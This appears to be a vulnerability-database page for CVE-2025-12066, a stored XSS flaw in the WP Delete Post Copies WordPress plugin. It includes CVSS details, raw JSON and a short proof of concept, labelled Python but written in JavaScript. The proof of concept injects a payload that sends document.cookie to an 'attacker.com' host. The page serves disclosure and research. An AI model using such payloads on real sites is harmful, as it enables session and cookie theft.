Security Vulnerability Report
中文
CVE-2025-12066 CVSS 4.4 MEDIUM

CVE-2025-12066

Published: 2025-11-21 10:15:47
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WP Delete Post Copies plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Delete Post Copies (etruel-del-post-copies) <= 6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-12066 PoC - Stored XSS in WP Delete Post Copies Plugin // Requirements: Admin-level privileges on WordPress multi-site or when unfiltered_html is disabled // Step 1: Login as admin and navigate to plugin settings page // URL: /wp-admin/options-general.php?page=etruel-del-post-copies // Step 2: Inject XSS payload in any settings field, for example: const xssPayload = '<script>alert(document.cookie)</script>'; // or more sophisticated payload: const advancedPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)"> '; // Step 3: Submit the form with the malicious payload // The payload will be stored and executed when admin accesses settings page again // Example using WordPress REST API or admin-ajax.php: fetch(ajaxurl, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=etruel_save_settings&setting_field=' + encodeURIComponent(xssPayload) + '&nonce=' + adminNonce });

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12066", "sourceIdentifier": "[email protected]", "published": "2025-11-21T10:15:46.710", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Delete Post Copies plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394571%40etruel-del-post-copies&new=3394571%40etruel-del-post-copies&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/92ab1f56-5ca6-48e8-b380-ac2e302d63d2?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.